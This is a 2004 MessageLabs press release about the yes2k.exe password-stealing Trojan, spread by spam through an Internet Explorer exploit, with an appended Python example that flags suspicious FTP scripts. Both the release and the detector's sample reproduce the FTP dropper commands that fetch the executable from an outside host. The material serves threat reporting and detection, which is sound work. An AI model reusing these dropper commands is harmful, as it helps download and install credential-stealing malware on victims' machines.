
MessageLabs: Security Threats - The Convergence of Virus and Spamming Techniques

New Trojan Demonstrates Increasing Complexity of Converged E-Mail Security Threats

(22.05.04) - MessageLabs, the leading provider of managed E-Mail security services to businesses, is urging global E-Mail users to be alert to the increasing sophistication of different E-Mail security threats that are resulting from the convergence of virus and spamming techniques. The warning comes further to MessageLabs' identification of a new password-stealing Trojan - filename yes2k.exe - which had attempted to spread via the use of spamming techniques.


MessageLabs was alerted to the threat when it detected a spam outbreak that uses the Microsoft Internet Explorer object data exploit to download an HTML script from a particular IP address. This creates and runs an FTP script to download and run yes2k.exe. Recently, spammers seeking to gain as wide an audience as possible for their messages have taken to employing virus-writing techniques to propagate their information. However, in this case, the approach has been turned on its head and it is the malicious code that is being spread after the spam has seeded the distribution network. Spam is more prevalent than viruses: in April MessageLabs scanned 841.1 million E-Mails and found that while 67 percent were spam, just 9 percent were infected with viruses.

Paul Wood, MessageLabs' Chief Information Analyst, says: "All the evidence shows that the lines between the different types of E-Mail security threat are becoming increasingly blurred. Viruses, Trojans and spam in particular are being thrown into the melting pot to create an increasingly sophisticated variety of E-Mail security threat. This technique is known as convergence, and we should expect to see rising numbers of converged threats in the future. In order to protect themselves, businesses need to ensure that they have a solution capable of guarding against all E-Mail security threats - whether they are in their simplest form or deployed as part of a converged attack."

Details of yes2k.exe:

Open (IP address)
ftp
any@any.net
bin
lcd C:/
get yes2k.exe
bye

yes2k is a password stealer packed with a modified version of UPX. (ma)
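
A defender's view of the FTP script listed above, as an added example that is not MessageLabs' code: it parses an FTP command script and flags the pattern of connecting out, fetching an executable and exiting unattended. The function names, the extension list and the sample scripts are assumptions of this example; 192.0.2.10 is a documentation placeholder for the undisclosed "(IP address)".

```python
# Added example: triage of an FTP command script dropped on a Windows host.
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".dll")  # assumed list

# Constructed sample mirroring the script in the article; 192.0.2.10 is a
# documentation placeholder standing in for the undisclosed "(IP address)".
SAMPLE = """Open 192.0.2.10
ftp
any@any.net
bin
lcd C:/
get yes2k.exe
bye
"""

# Constructed benign script for contrast.
BENIGN = """open 192.0.2.10
ftp
any@any.net
ascii
get readme.txt
bye
"""

def parse_ftp_script(text):
    """Return (command, args) pairs; blank lines skipped, commands lower-cased.
    Login replies after `open` are parsed like any line and ignored by the checks."""
    return [(p[0].lower(), p[1:]) for p in (l.split() for l in text.splitlines()) if p]

def assess_ftp_script(text):
    """Flag scripts that connect out, fetch an executable and exit unattended."""
    cmds = parse_ftp_script(text)
    names = [c for c, _ in cmds]
    fetched = []
    for c, args in cmds:
        if c in ("get", "recv"):
            fetched += args[:1]      # first argument is the remote file
        elif c == "mget":
            fetched += args          # every argument is a remote file
    executables = [f for f in fetched if f.lower().endswith(EXEC_EXT)]
    result = {
        "opens_remote_host": "open" in names,
        "binary_mode": any(c in ("bin", "binary") for c in names),
        "lcd_target": next((a[0] for c, a in cmds if c == "lcd" and a), None),
        "executables_fetched": executables,
        "exits_unattended": bool(names) and names[-1] in ("bye", "quit"),
    }
    result["suspicious"] = bool(executables and result["opens_remote_host"]
                                and result["exits_unattended"])
    return result
```

Calling `assess_ftp_script(SAMPLE)` flags the article's script, while `assess_ftp_script(BENIGN)` does not.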

MessageLabs

Office UK:

Tel. (0044-1452) 627627, Fax (0044-1452) 627628

Sales:

E-Mail: salesquery@messagelabs.com

General:

E-Mail: info@messagelabs.com

Web: www.messagelabs.com

MessageLabs: Germany

Contact: Henning Ogberg

Tel. (089) 189-43990, Fax (089) 189-4399-9

E-Mail: hogberg@messagelabs.com

Web: www.messagelabs.com
